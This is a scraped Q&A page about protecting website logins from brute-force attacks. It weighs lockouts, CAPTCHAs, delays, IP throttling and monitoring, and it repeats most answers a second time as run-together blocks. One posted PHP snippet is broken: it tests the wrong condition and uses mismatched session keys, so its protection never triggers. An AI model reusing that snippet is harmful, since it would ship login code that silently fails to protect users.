Using correct IP with PHP [duplicate] - php
As a response to the recent Twitter hijackings and Jeff's post on Dictionary Attacks, what is the best way to secure your website against brute force login attacks?
Jeff's post suggests putting in an increasing delay for each attempted login, and a suggestion in the comments is to add a captcha after the 2nd failed attempt.
Both these seem like good ideas, but how do you know what "attempt number" it is? You can't rely on a session ID (because an attacker could change it each time) or an IP address (better, but vulnerable to botnets). Simply logging it against the username could, using the delay method, lock out a legitimate user (or at least make the login process very slow for them).
Thoughts? Suggestions?
I think database-persisted short lockout period for the given account (1-5 minutes) is the only way to handle this. Each userid in your database contains a timeOfLastFailedLogin and numberOfFailedAttempts. When numbeOfFailedAttempts > X you lockout for some minutes.
This means you're locking the userid in question for some time, but not permanently. It also means you're updating the database for each login attempt (unless it is locked, of course), which may be causing other problems.
There is at least one whole country is NAT'ed in asia, so IP's cannot be used for anything.
In my eyes there are several possibilities, each having cons and pros:
Forcing secure passwords
Pro: Will prevent dictionary attacks
Con: Will also prevent popularity, since most users are not able to remember complex passwords, even if you explain to them, how to easy remember them. For example by remembering sentences: "I bought 1 Apple for 5 Cent in the Mall" leads to "Ib1Af5CitM".
Lockouts after several attempts
Pro: Will slow down automated tests
Con: It's easy to lock out users for third parties
Con: Making them persistent in a database can result in a lot of write processes in such huge services as Twitter or comparables.
Captchas
Pro: They prevent automated testing
Con: They are consuming computing time
Con: Will "slow down" the user experience
HUGE CON: They are NOT barrier-free
Simple knowledge checks
Pro: Will prevent automated testing
Con: "Simple" is in the eye of the beholder.
Con: Will "slow down" the user experience
Different login and username
Pro: This is one technic, that is hardly seen, but in my eyes a pretty good start to prevent brute force attacks.
Con: Depends on the users choice of the two names.
Use whole sentences as passwords
Pro: Increases the size of the searchable space of possibilities.
Pro: Are easier to remember for most users.
Con: Depend on the users choice.
As you can see, the "good" solutions all depend on the users choice, which again reveals the user as the weakest element of the chain.
Any other suggestions?
You could do what Google does. Which is after a certain number of trys they have a captacha show up. Than after a couple of times with the captacha you lock them out for a couple of minutes.
I tend to agree with most of the other comments:
Lock after X failed password attempts
Count failed attempts against username
Optionally use CAPTCHA (for example, attempts 1-2 are normal, attempts 3-5 are CAPTCHA'd, further attempts blocked for 15 minutes).
Optionally send an e-mail to the account owner to remove the block
What I did want to point out is that you should be very careful about forcing "strong" passwords, as this often means they'll just be written on a post-it on the desk/attached to the monitor. Also, some password policies lead to more predictable passwords. For example:
If the password cannot be any previous used password and must include a number, there's a good chance that it'll be any common password with a sequential number after it. If you have to change your password every 6 months, and a person has been there two years, chances are their password is something like password4.
Say you restrict it even more: must be at least 8 characters, cannot have any sequential letters, must have a letter, a number and a special character (this is a real password policy that many would consider secure). Trying to break into John Quincy Smith's account? Know he was born March 6th? There's a good chance his password is something like jqs0306! (or maybe jqs0306~).
Now, I'm not saying that letting your users have the password password is a good idea either, just don't kid yourself thinking that your forced "secure" passwords are secure.
To elaborate on the best practice:
What krosenvold said: log num_failed_logins and last_failed_time in the user table (except when the user is suspended), and once the number of failed logins reach a treshold, you suspend the user for 30 seconds or a minute. It is the best practice.
That method effectively eliminates single-account brute-force and dictionary attacks. However, it does not prevent an attacker from switching between user names - ie. keeping the password fixed and trying it with a large number of usernames. If your site has enough users, that kind of attack can be kept going for a long time before it runs out of unsuspended accounts to hit. Hopefully, he will be running this attack from a single IP (not likely though, as botnets are really becoming the tool of the trade these days) so you can detect that and block the IP, but if he is distributing the attack... well, that's another question (that I just posted here, so please check it out if you haven't).
One additional thing to remember about the original idea is that you should of course still try to let the legitimate user through, even while the account is being attacked and suspended -- that is, IF you can tell the real user and the bot apart.
And you CAN, in at least two ways.
If the user has a persistent login ("remember me") cookie, just let him pass through.
When you display the "I'm sorry, your account is suspended due to a large number of unsuccessful login attempts" message, include a link that says "secure backup login - HUMANS ONLY (bots: no lying)". Joke aside, when they click that link, give them a reCAPTCHA-authenticated login form that bypasses the account's suspend status. That way, IF they are human AND know the correct login+password (and are able to read CAPTCHAs), they will never be bothered by delays, and your site will be impervious to rapid-fire attacks.
Only drawback: some people (such as the vision-impaired) cannot read CAPTCHAs, and they MAY still be affected by annoying bot-produced delays IF they're not using the autologin feature.
What ISN'T a drawback: that the autologin cookie doesn't have a similar security measure built-in. Why isn't this a drawback, you ask? Because as long as you've implemented it wisely, the secure token (the password equivalent) in your login cookie is twice as many bits (heck, make that ten times as many bits!) as your password, so brute-forcing it is effectively a non-issue. But if you're really paranoid, set up a one-second delay on the autologin feature as well, just for good measure.
You should implement a cache in the application not associated with your backend database for this purpose.
First and foremost delaying only legitimate usernames causes you to "give up" en-mass your valid customer base which can in itself be a problem even if username is not a closely guarded secret.
Second depending on your application you can be a little smarter with an application specific delay countermeasures than you might want to be with storing the data in a DB.
Its resistant to high speed attempts that would leak a DOS condition into your backend db.
Finally it is acceptable to make some decisions based on IP... If you see single attempts from one IP chances are its an honest mistake vs multiple IPs from god knows how many systems you may want to take other precautions or notify the end user of shady activity.
Its true large proxy federations can have massive numbers of IP addresses reserved for their use but most do make a reasonable effort to maintain your source address for a period of time for legacy purposes as some sites have a habbit of tieing cookie data to IP.
Do like most banks do, lockout the username/account after X login failures. But I wouldn't be as strict as a bank in that you must call in to unlock your account. I would just make a temporary lock out of 1-5 minutes. Unless of course, the web application is as data sensitive as a bank. :)
This is an old post. However, I thought of putting my findings here so that it might help any future developer.
We need to prevent brute-force attack so that the attacker can not harvest the user name and password of a website login. In many systems, they have some open ended urls which does not require an authentication token or API key for authorization. Most of these APIs are critical. For example; Signup, Login and Forget Password APIs are often open (i.e. does not require a validation of the authentication token). We need to ensure that the services are not abused. As stated earlier, I am just putting my findings here while studying about how we can prevent a brute force attack efficiently.
Most of the common prevention techniques are already discussed in this post. I would like to add my concerns regarding account locking and IP address locking. I think locking accounts is a bad idea as a prevention technique. I am putting some points here to support my cause.
Account locking is bad
An attacker can cause a denial of service (DoS) by locking out large numbers of accounts.
Because you cannot lock out an account that does not exist, only valid account names will lock. An attacker could use this fact to harvest usernames from the site, depending on the error responses.
An attacker can cause a diversion by locking out many accounts and flooding the help desk with support calls.
An attacker can continuously lock out the same account, even seconds after an administrator unlocks it, effectively disabling the account.
Account lockout is ineffective against slow attacks that try only a few passwords every hour.
Account lockout is ineffective against attacks that try one password against a large list of usernames.
Account lockout is ineffective if the attacker is using a username/password combo list and guesses correctly on the first couple of attempts.
Powerful accounts such as administrator accounts often bypass lockout policy, but these are the most desirable accounts to attack. Some systems lock out administrator accounts only on network-based logins.
Even once you lock out an account, the attack may continue, consuming valuable human and computer resources.
Consider, for example, an auction site on which several bidders are fighting over the same item. If the auction web site enforced account lockouts, one bidder could simply lock the others' accounts in the last minute of the auction, preventing them from submitting any winning bids. An attacker could use the same technique to block critical financial transactions or e-mail communications.
IP address locking for a account is a bad idea too
Another solution is to lock out an IP address with multiple failed logins. The problem with this solution is that you could inadvertently block large groups of users by blocking a proxy server used by an ISP or large company. Another problem is that many tools utilize proxy lists and send only a few requests from each IP address before moving on to the next. Using widely available open proxy lists at websites such as http://tools.rosinstrument.com/proxy/, an attacker could easily circumvent any IP blocking mechanism. Because most sites do not block after just one failed password, an attacker can use two or three attempts per proxy. An attacker with a list of 1,000 proxies can attempt 2,000 or 3,000 passwords without being blocked. Nevertheless, despite this method's weaknesses, websites that experience high numbers of attacks, adult Web sites in particular, do choose to block proxy IP addresses.
My proposition
Not locking the account. Instead, we might consider adding intentional delay from server side in the login/signup attempts for consecutive wrong attempts.
Tracking user location based on IP address in login attempts, which is a common technique used by Google and Facebook. Google sends a OTP while Facebook provides other security challenges like detecting user's friends from the photos.
Google re-captcha for web application, SafetyNet for Android and proper mobile application attestation technique for iOS - in login or signup requests.
Device cookie
Building a API call monitoring system to detect unusual calls for a certain API endpoint.
Propositions Explained
Intentional delay in response
The password authentication delay significantly slows down the attacker, since the success of the attack is dependent on time. An easy solution is to inject random pauses when checking a password. Adding even a few seconds' pause will not bother most legitimate users as they log in to their accounts.
Note that although adding a delay could slow a single-threaded attack, it is less effective if the attacker sends multiple simultaneous authentication requests.
Security challenges
This technique can be described as adaptive security challenges based on the actions performed by the user in using the system earlier. In case of a new user, this technique might throw default security challenges.
We might consider putting in when we will throw security challenges? There are several points where we can.
When user is trying to login from a location where he was not located nearby before.
Wrong attempts on login.
What kind of security challenge user might face?
If user sets up the security questions, we might consider asking the user answers of those.
For the applications like Whatsapp, Viber etc. we might consider taking some random contact names from phonebook and ask to put the numbers of them or vice versa.
For transactional systems, we might consider asking the user about latest transactions and payments.
API monitoring panel
To build a monitoring panel for API calls.
Look for the conditions that could indicate a brute-force attack or other account abuse in the API monitoring panel.
Many failed logins from the same IP address.
Logins with multiple usernames from the same IP address.
Logins for a single account coming from many different IP addresses.
Excessive usage and bandwidth consumption from a single use.
Failed login attempts from alphabetically sequential usernames or passwords.
Logins with suspicious passwords hackers commonly use, such as ownsyou (ownzyou), washere (wazhere), zealots, hacksyou etc.
For internal system accounts we might consider allowing login only from certain IP addresses. If the account locking needs to be in place, instead of completely locking out an account, place it in a lockdown mode with limited capabilities.
Here are some good reads.
https://en.wikipedia.org/wiki/Brute-force_attack#Reverse_brute-force_attack
https://www.owasp.org/index.php/Blocking_Brute_Force_Attacks
http://www.computerweekly.com/answer/Techniques-for-preventing-a-brute-force-login-attack
I think you should log againt the username. This is the only constant (anything else can be spoofed). And yes it could lock out a legitimate user for a day. But if I must choose between an hacked account and a closed account (for a day) I definitely chose the lock.
By the way, after a third failed attempt (within a certain time) you can lock the account and send a release mail to the owner. The mail contains a link to unlock the account. This is a slight burden on the user but the cracker is blocked. And if even the mail account is hacked you could set a limit on the number of unlockings per day.
A lot of online message boards that I log into online give me 5 attempts at logging into an account, after those 5 attempts the account is locked for an hour or fifteen minutes. It may not be pretty, but this would certainly slow down a dictionary attack on one account. Now nothing is stopping a dictionary attack against multiple accounts at the same time. Ie try 5 times, switch to a different account, try another 5 times, then circle back. But it sure does slow down the attack.
The best defense against a dictionary attack is to make sure the passwords are not in a dictionary!!! Basically set up some sort of password policy that checks a dictionary against the letters and requires a number or symbol in the password. This is probably the best defense against a dictionary attack.
You could add some form of CAPTCHA test. But beware that most of them render access more difficult eye or earing impaired people. An interesting form of CAPTCHA is asking a question,
What is the sum of 2 and 2?
And if you record the last login failure, you can skip the CAPTCHA if it is old enough. Only do the CAPTCHA test if the last failure was during the last 10 minutes.
For .NET Environment
Dynamic IP Restrictions
The Dynamic IP Restrictions Extension for IIS provides IT Professionals and Hosters a configurable module that helps mitigate or block Denial of Service Attacks or cracking of passwords through Brute-force by temporarily blocking Internet Protocol (IP) addresses of HTTP clients who follow a pattern that could be conducive to one of such attacks. This module can be configured such that the analysis and blocking could be done at the Web Server or the Web Site level.
Reduce the chances of a Denial of Service attack by dynamically blocking requests from malicious IP addresses
Dynamic IP Restrictions for IIS allows you to reduce the probabilities of your Web Server being subject to a Denial of Service attack by inspecting the source IP of the requests and identifying patterns that could signal an attack. When an attack pattern is detected, the module will place the offending IP in a temporary deny list and will avoid responding to the requests for a predetermined amount of time.
Minimize the possibilities of Brute-force-cracking of the passwords of your Web Server
Dynamic IP Restrictions for IIS is able to detect requests patterns that indicate the passwords of the Web Server are attempted to be decoded. The module will place the offending IP on a list of servers that are denied access for a predetermined amount of time. In situations where the authentication is done against an Active Directory Services (ADS) the module is able to maintain the availability of the Web Server by avoiding having to issue authentication challenges to ADS.
Features
Seamless integration into IIS 7.0 Manager.
Dynamically blocking of requests from IP address based on either of the following criteria:
The number of concurrent requests.
The number of requests over a period of time.
Support for list of IPs that are allowed to bypass Dynamic IP Restriction filtering.
Blocking of requests can be configurable at the Web Site or Web Server level.
Configurable deny actions allows IT Administrators to specify what response would be returned to the client. The module support return status codes 403, 404 or closing the connection.
Support for IPv6 addresses.
Support for web servers behind a proxy or firewall that may modify the client IP address.
http://www.iis.net/download/DynamicIPRestrictions
Old post but let me post what I have in this the end 2016. Hope it still could help.
It's a simple way but I think it's powerful to prevent login attack. At least I always use it on every web of mine. We don't need CAPTCHA or any other third party plugins.
When user login for the first time. We create a session like
$_SESSION['loginFail'] = 10; // any number you prefer
If login success, then we will destroy it and let user login.
unset($_SESSION['loginFail']); // put it after create login session
But if user fail, as we usually sent error message to them, at the same time we reduce the session by 1 :
$_SESSION['loginFail']-- ; // reduce 1 for every error
and if user fail 10 times, then we will direct them to other website or any web pages.
if (!isset($_SESSION['loginFail'])) {
if ($_SESSION['login_fail'] < 1 ) {
header('Location:https://google.com/'); // or any web page
exit();
}
}
By this way, user can not open or go to our login page anymore, cause it has redirected to other website.
Users has to close the browser ( to destroy session loginFail that we created), open it 'again' to see our login page 'again'.
Is it helpful?
There are several aspects to be considered to prevent brute-force. consider given aspects.
Password Strenght
Force users to create a password to meet specific criteria
Password should contain at least one uppercase, lowercase, digit and symbol(special character).
Password should have a minimum length defined according to your criteria.
Password should not contain a user name or the public user id.
By creating the minimum password strength policy, brute-force will take time to guess the password. meanwhile, your app can identify such thing and migrate it.
reCaptcha
You can use reCaptcha to prevent bot scripts having brute-force function. It's fairly easy to implement the reCaptcha in web application. You can use Google reCaptcha. it has several flavors of reCaptcha like Invisible reCaptcha and reCaptcha v3.
Dynamic IP filtering Policy
You can dynamically identify the pattern of request and block the IP if the pattern matches the attack vector criteria. one of the most popular technique to filter the login attempts is Throttling. Read the Throttling Technique using php to know more. A good dynamic IP filtering policy also protects you from attacks like DoS and DDos. However, it doesn't help to prevent DRDos.
CSRF Prevention Mechanism
the csrf is known as cross-site request forgery. Means the other sites are submitting forms on your PHP script/Controller. Laravel has a pretty well-defined approach to prevent csrf. However, if you are not using such a framework, you have to design your own JWT based csrf prevention mechanism. If your site is CSRF Protected, then there is no chance to launch brute-force on any forms on your website. It's just like the main gate you closed.
Related
Prevent a device from doing an action multiple times
So I have a web application which is going to collect people's opinion (People have to choose option 1 or option 2). I don't want anyone to submit their opinion twice or more, which makes me think an opinion is more popular when it isn't, so I think of several ways, but they all have their disadvantage: Check user's IP address: user can change their IP easily by using web proxy or something like that. Check user's HWID like what I did on another desktop application: Seem like it's impossible with php Can you suggest me a way which is the most effective for my web application's issue? The ideal solution is having only one vote per device, but I have no idea how to do it with PHP. Edit: Please give me your advice on this: does cookie work with web proxy? If the application stored a cookie, then the user open the website with web proxy or simply use private browsing, is the cookie still there? If it is, a combination between IP address and cookie may works.
To prevent accidental multiple submissions, require a login and save the vote in a database, or create a random unique ID that is tied to the user's session, and save that one with the vote, rejecting votes whose IDs already exist, or save a flag in the session that the user already voted. You could use ever-/super-cookies to make deliberately faking votes harder, but you cannot prevent them unless you have some means to verify an identity and ensure that no person can have multiple identities, e.g. ID cards issued by the government with functions for eCommerce and e(Whatever), social security numbers. However, you will have to interface with an institution performing the verification for you. And ever-/super-cookies and browser fingerprinting are vulnerable to the use of multiple browsers and break when facing paranoid users. If you want to prevent multiple deliberate votes with low security and reliability, you could establish an identity like on StackExchange / StackOverflow, i.e. reputation-based, and prevent votes until someone has gained some reputation level. Or you could require phone-/account-/credit-card-/payments-based verification with low level of confidence (e.g. send SMS text message with verification code to phone number, Facebook, Google, Amazon, PayPal, Stripe...) - people can have multiple phones, accounts, credit/debit cards etc. In the end, there is no easy-to-use system for identity verification that prevents multiple identities with high confidence (that I know of).
Using token to access sensitive data [duplicate]
As a response to the recent Twitter hijackings and Jeff's post on Dictionary Attacks, what is the best way to secure your website against brute force login attacks? Jeff's post suggests putting in an increasing delay for each attempted login, and a suggestion in the comments is to add a captcha after the 2nd failed attempt. Both these seem like good ideas, but how do you know what "attempt number" it is? You can't rely on a session ID (because an attacker could change it each time) or an IP address (better, but vulnerable to botnets). Simply logging it against the username could, using the delay method, lock out a legitimate user (or at least make the login process very slow for them). Thoughts? Suggestions?
I think database-persisted short lockout period for the given account (1-5 minutes) is the only way to handle this. Each userid in your database contains a timeOfLastFailedLogin and numberOfFailedAttempts. When numbeOfFailedAttempts > X you lockout for some minutes. This means you're locking the userid in question for some time, but not permanently. It also means you're updating the database for each login attempt (unless it is locked, of course), which may be causing other problems. There is at least one whole country is NAT'ed in asia, so IP's cannot be used for anything.
In my eyes there are several possibilities, each having cons and pros: Forcing secure passwords Pro: Will prevent dictionary attacks Con: Will also prevent popularity, since most users are not able to remember complex passwords, even if you explain to them, how to easy remember them. For example by remembering sentences: "I bought 1 Apple for 5 Cent in the Mall" leads to "Ib1Af5CitM". Lockouts after several attempts Pro: Will slow down automated tests Con: It's easy to lock out users for third parties Con: Making them persistent in a database can result in a lot of write processes in such huge services as Twitter or comparables. Captchas Pro: They prevent automated testing Con: They are consuming computing time Con: Will "slow down" the user experience HUGE CON: They are NOT barrier-free Simple knowledge checks Pro: Will prevent automated testing Con: "Simple" is in the eye of the beholder. Con: Will "slow down" the user experience Different login and username Pro: This is one technic, that is hardly seen, but in my eyes a pretty good start to prevent brute force attacks. Con: Depends on the users choice of the two names. Use whole sentences as passwords Pro: Increases the size of the searchable space of possibilities. Pro: Are easier to remember for most users. Con: Depend on the users choice. As you can see, the "good" solutions all depend on the users choice, which again reveals the user as the weakest element of the chain. Any other suggestions?
You could do what Google does. Which is after a certain number of trys they have a captacha show up. Than after a couple of times with the captacha you lock them out for a couple of minutes.
I tend to agree with most of the other comments: Lock after X failed password attempts Count failed attempts against username Optionally use CAPTCHA (for example, attempts 1-2 are normal, attempts 3-5 are CAPTCHA'd, further attempts blocked for 15 minutes). Optionally send an e-mail to the account owner to remove the block What I did want to point out is that you should be very careful about forcing "strong" passwords, as this often means they'll just be written on a post-it on the desk/attached to the monitor. Also, some password policies lead to more predictable passwords. For example: If the password cannot be any previous used password and must include a number, there's a good chance that it'll be any common password with a sequential number after it. If you have to change your password every 6 months, and a person has been there two years, chances are their password is something like password4. Say you restrict it even more: must be at least 8 characters, cannot have any sequential letters, must have a letter, a number and a special character (this is a real password policy that many would consider secure). Trying to break into John Quincy Smith's account? Know he was born March 6th? There's a good chance his password is something like jqs0306! (or maybe jqs0306~). Now, I'm not saying that letting your users have the password password is a good idea either, just don't kid yourself thinking that your forced "secure" passwords are secure.
To elaborate on the best practice: What krosenvold said: log num_failed_logins and last_failed_time in the user table (except when the user is suspended), and once the number of failed logins reach a treshold, you suspend the user for 30 seconds or a minute. It is the best practice. That method effectively eliminates single-account brute-force and dictionary attacks. However, it does not prevent an attacker from switching between user names - ie. keeping the password fixed and trying it with a large number of usernames. If your site has enough users, that kind of attack can be kept going for a long time before it runs out of unsuspended accounts to hit. Hopefully, he will be running this attack from a single IP (not likely though, as botnets are really becoming the tool of the trade these days) so you can detect that and block the IP, but if he is distributing the attack... well, that's another question (that I just posted here, so please check it out if you haven't). One additional thing to remember about the original idea is that you should of course still try to let the legitimate user through, even while the account is being attacked and suspended -- that is, IF you can tell the real user and the bot apart. And you CAN, in at least two ways. If the user has a persistent login ("remember me") cookie, just let him pass through. When you display the "I'm sorry, your account is suspended due to a large number of unsuccessful login attempts" message, include a link that says "secure backup login - HUMANS ONLY (bots: no lying)". Joke aside, when they click that link, give them a reCAPTCHA-authenticated login form that bypasses the account's suspend status. That way, IF they are human AND know the correct login+password (and are able to read CAPTCHAs), they will never be bothered by delays, and your site will be impervious to rapid-fire attacks. Only drawback: some people (such as the vision-impaired) cannot read CAPTCHAs, and they MAY still be affected by annoying bot-produced delays IF they're not using the autologin feature. What ISN'T a drawback: that the autologin cookie doesn't have a similar security measure built-in. Why isn't this a drawback, you ask? Because as long as you've implemented it wisely, the secure token (the password equivalent) in your login cookie is twice as many bits (heck, make that ten times as many bits!) as your password, so brute-forcing it is effectively a non-issue. But if you're really paranoid, set up a one-second delay on the autologin feature as well, just for good measure.
You should implement a cache in the application not associated with your backend database for this purpose. First and foremost delaying only legitimate usernames causes you to "give up" en-mass your valid customer base which can in itself be a problem even if username is not a closely guarded secret. Second depending on your application you can be a little smarter with an application specific delay countermeasures than you might want to be with storing the data in a DB. Its resistant to high speed attempts that would leak a DOS condition into your backend db. Finally it is acceptable to make some decisions based on IP... If you see single attempts from one IP chances are its an honest mistake vs multiple IPs from god knows how many systems you may want to take other precautions or notify the end user of shady activity. Its true large proxy federations can have massive numbers of IP addresses reserved for their use but most do make a reasonable effort to maintain your source address for a period of time for legacy purposes as some sites have a habbit of tieing cookie data to IP.
Do like most banks do, lockout the username/account after X login failures. But I wouldn't be as strict as a bank in that you must call in to unlock your account. I would just make a temporary lock out of 1-5 minutes. Unless of course, the web application is as data sensitive as a bank. :)
This is an old post. However, I thought of putting my findings here so that it might help any future developer. We need to prevent brute-force attack so that the attacker can not harvest the user name and password of a website login. In many systems, they have some open ended urls which does not require an authentication token or API key for authorization. Most of these APIs are critical. For example; Signup, Login and Forget Password APIs are often open (i.e. does not require a validation of the authentication token). We need to ensure that the services are not abused. As stated earlier, I am just putting my findings here while studying about how we can prevent a brute force attack efficiently. Most of the common prevention techniques are already discussed in this post. I would like to add my concerns regarding account locking and IP address locking. I think locking accounts is a bad idea as a prevention technique. I am putting some points here to support my cause. Account locking is bad An attacker can cause a denial of service (DoS) by locking out large numbers of accounts. Because you cannot lock out an account that does not exist, only valid account names will lock. An attacker could use this fact to harvest usernames from the site, depending on the error responses. An attacker can cause a diversion by locking out many accounts and flooding the help desk with support calls. An attacker can continuously lock out the same account, even seconds after an administrator unlocks it, effectively disabling the account. Account lockout is ineffective against slow attacks that try only a few passwords every hour. Account lockout is ineffective against attacks that try one password against a large list of usernames. Account lockout is ineffective if the attacker is using a username/password combo list and guesses correctly on the first couple of attempts. Powerful accounts such as administrator accounts often bypass lockout policy, but these are the most desirable accounts to attack. Some systems lock out administrator accounts only on network-based logins. Even once you lock out an account, the attack may continue, consuming valuable human and computer resources. Consider, for example, an auction site on which several bidders are fighting over the same item. If the auction web site enforced account lockouts, one bidder could simply lock the others' accounts in the last minute of the auction, preventing them from submitting any winning bids. An attacker could use the same technique to block critical financial transactions or e-mail communications. IP address locking for a account is a bad idea too Another solution is to lock out an IP address with multiple failed logins. The problem with this solution is that you could inadvertently block large groups of users by blocking a proxy server used by an ISP or large company. Another problem is that many tools utilize proxy lists and send only a few requests from each IP address before moving on to the next. Using widely available open proxy lists at websites such as http://tools.rosinstrument.com/proxy/, an attacker could easily circumvent any IP blocking mechanism. Because most sites do not block after just one failed password, an attacker can use two or three attempts per proxy. An attacker with a list of 1,000 proxies can attempt 2,000 or 3,000 passwords without being blocked. Nevertheless, despite this method's weaknesses, websites that experience high numbers of attacks, adult Web sites in particular, do choose to block proxy IP addresses. My proposition Not locking the account. Instead, we might consider adding intentional delay from server side in the login/signup attempts for consecutive wrong attempts. Tracking user location based on IP address in login attempts, which is a common technique used by Google and Facebook. Google sends a OTP while Facebook provides other security challenges like detecting user's friends from the photos. Google re-captcha for web application, SafetyNet for Android and proper mobile application attestation technique for iOS - in login or signup requests. Device cookie Building a API call monitoring system to detect unusual calls for a certain API endpoint. Propositions Explained Intentional delay in response The password authentication delay significantly slows down the attacker, since the success of the attack is dependent on time. An easy solution is to inject random pauses when checking a password. Adding even a few seconds' pause will not bother most legitimate users as they log in to their accounts. Note that although adding a delay could slow a single-threaded attack, it is less effective if the attacker sends multiple simultaneous authentication requests. Security challenges This technique can be described as adaptive security challenges based on the actions performed by the user in using the system earlier. In case of a new user, this technique might throw default security challenges. We might consider putting in when we will throw security challenges? There are several points where we can. When user is trying to login from a location where he was not located nearby before. Wrong attempts on login. What kind of security challenge user might face? If user sets up the security questions, we might consider asking the user answers of those. For the applications like Whatsapp, Viber etc. we might consider taking some random contact names from phonebook and ask to put the numbers of them or vice versa. For transactional systems, we might consider asking the user about latest transactions and payments. API monitoring panel To build a monitoring panel for API calls. Look for the conditions that could indicate a brute-force attack or other account abuse in the API monitoring panel. Many failed logins from the same IP address. Logins with multiple usernames from the same IP address. Logins for a single account coming from many different IP addresses. Excessive usage and bandwidth consumption from a single use. Failed login attempts from alphabetically sequential usernames or passwords. Logins with suspicious passwords hackers commonly use, such as ownsyou (ownzyou), washere (wazhere), zealots, hacksyou etc. For internal system accounts we might consider allowing login only from certain IP addresses. If the account locking needs to be in place, instead of completely locking out an account, place it in a lockdown mode with limited capabilities. Here are some good reads. https://en.wikipedia.org/wiki/Brute-force_attack#Reverse_brute-force_attack https://www.owasp.org/index.php/Blocking_Brute_Force_Attacks http://www.computerweekly.com/answer/Techniques-for-preventing-a-brute-force-login-attack
I think you should log againt the username. This is the only constant (anything else can be spoofed). And yes it could lock out a legitimate user for a day. But if I must choose between an hacked account and a closed account (for a day) I definitely chose the lock. By the way, after a third failed attempt (within a certain time) you can lock the account and send a release mail to the owner. The mail contains a link to unlock the account. This is a slight burden on the user but the cracker is blocked. And if even the mail account is hacked you could set a limit on the number of unlockings per day.
A lot of online message boards that I log into online give me 5 attempts at logging into an account, after those 5 attempts the account is locked for an hour or fifteen minutes. It may not be pretty, but this would certainly slow down a dictionary attack on one account. Now nothing is stopping a dictionary attack against multiple accounts at the same time. Ie try 5 times, switch to a different account, try another 5 times, then circle back. But it sure does slow down the attack. The best defense against a dictionary attack is to make sure the passwords are not in a dictionary!!! Basically set up some sort of password policy that checks a dictionary against the letters and requires a number or symbol in the password. This is probably the best defense against a dictionary attack.
You could add some form of CAPTCHA test. But beware that most of them render access more difficult eye or earing impaired people. An interesting form of CAPTCHA is asking a question, What is the sum of 2 and 2? And if you record the last login failure, you can skip the CAPTCHA if it is old enough. Only do the CAPTCHA test if the last failure was during the last 10 minutes.
For .NET Environment Dynamic IP Restrictions The Dynamic IP Restrictions Extension for IIS provides IT Professionals and Hosters a configurable module that helps mitigate or block Denial of Service Attacks or cracking of passwords through Brute-force by temporarily blocking Internet Protocol (IP) addresses of HTTP clients who follow a pattern that could be conducive to one of such attacks. This module can be configured such that the analysis and blocking could be done at the Web Server or the Web Site level. Reduce the chances of a Denial of Service attack by dynamically blocking requests from malicious IP addresses Dynamic IP Restrictions for IIS allows you to reduce the probabilities of your Web Server being subject to a Denial of Service attack by inspecting the source IP of the requests and identifying patterns that could signal an attack. When an attack pattern is detected, the module will place the offending IP in a temporary deny list and will avoid responding to the requests for a predetermined amount of time. Minimize the possibilities of Brute-force-cracking of the passwords of your Web Server Dynamic IP Restrictions for IIS is able to detect requests patterns that indicate the passwords of the Web Server are attempted to be decoded. The module will place the offending IP on a list of servers that are denied access for a predetermined amount of time. In situations where the authentication is done against an Active Directory Services (ADS) the module is able to maintain the availability of the Web Server by avoiding having to issue authentication challenges to ADS. Features Seamless integration into IIS 7.0 Manager. Dynamically blocking of requests from IP address based on either of the following criteria: The number of concurrent requests. The number of requests over a period of time. Support for list of IPs that are allowed to bypass Dynamic IP Restriction filtering. Blocking of requests can be configurable at the Web Site or Web Server level. Configurable deny actions allows IT Administrators to specify what response would be returned to the client. The module support return status codes 403, 404 or closing the connection. Support for IPv6 addresses. Support for web servers behind a proxy or firewall that may modify the client IP address. http://www.iis.net/download/DynamicIPRestrictions
Old post but let me post what I have in this the end 2016. Hope it still could help. It's a simple way but I think it's powerful to prevent login attack. At least I always use it on every web of mine. We don't need CAPTCHA or any other third party plugins. When user login for the first time. We create a session like $_SESSION['loginFail'] = 10; // any number you prefer If login success, then we will destroy it and let user login. unset($_SESSION['loginFail']); // put it after create login session But if user fail, as we usually sent error message to them, at the same time we reduce the session by 1 : $_SESSION['loginFail']-- ; // reduce 1 for every error and if user fail 10 times, then we will direct them to other website or any web pages. if (!isset($_SESSION['loginFail'])) { if ($_SESSION['login_fail'] < 1 ) { header('Location:https://google.com/'); // or any web page exit(); } } By this way, user can not open or go to our login page anymore, cause it has redirected to other website. Users has to close the browser ( to destroy session loginFail that we created), open it 'again' to see our login page 'again'. Is it helpful?
There are several aspects to be considered to prevent brute-force. consider given aspects. Password Strenght Force users to create a password to meet specific criteria Password should contain at least one uppercase, lowercase, digit and symbol(special character). Password should have a minimum length defined according to your criteria. Password should not contain a user name or the public user id. By creating the minimum password strength policy, brute-force will take time to guess the password. meanwhile, your app can identify such thing and migrate it. reCaptcha You can use reCaptcha to prevent bot scripts having brute-force function. It's fairly easy to implement the reCaptcha in web application. You can use Google reCaptcha. it has several flavors of reCaptcha like Invisible reCaptcha and reCaptcha v3. Dynamic IP filtering Policy You can dynamically identify the pattern of request and block the IP if the pattern matches the attack vector criteria. one of the most popular technique to filter the login attempts is Throttling. Read the Throttling Technique using php to know more. A good dynamic IP filtering policy also protects you from attacks like DoS and DDos. However, it doesn't help to prevent DRDos. CSRF Prevention Mechanism the csrf is known as cross-site request forgery. Means the other sites are submitting forms on your PHP script/Controller. Laravel has a pretty well-defined approach to prevent csrf. However, if you are not using such a framework, you have to design your own JWT based csrf prevention mechanism. If your site is CSRF Protected, then there is no chance to launch brute-force on any forms on your website. It's just like the main gate you closed.
Setting a timer in between incorrect logins
i have a finishing touch for my login form and want to set a 2 second timer in between invalid logins. I had two different ideas, one would be to set a cookie that expired in X amount of seconds. Then on login, check if there is a cookie set. I am not sure however if a user can refuse to let a website set a cookie? So this could be got around. The second idea is new DB table with the fields 'IP' and the time of invalid login. On invalid login, a field would be created with the users IP and then the time. Upon logging in i would check this table for a matching ip and if the login time is less than X amount of seconds it is refused. But this could be also got around using IP proxies etc? The aim of doing this would be to prevent DDOS brute force attacks, and im guessing someone trying to do this would be quite aware of how to fake an IP / disallow cookies. What is the best way for this?
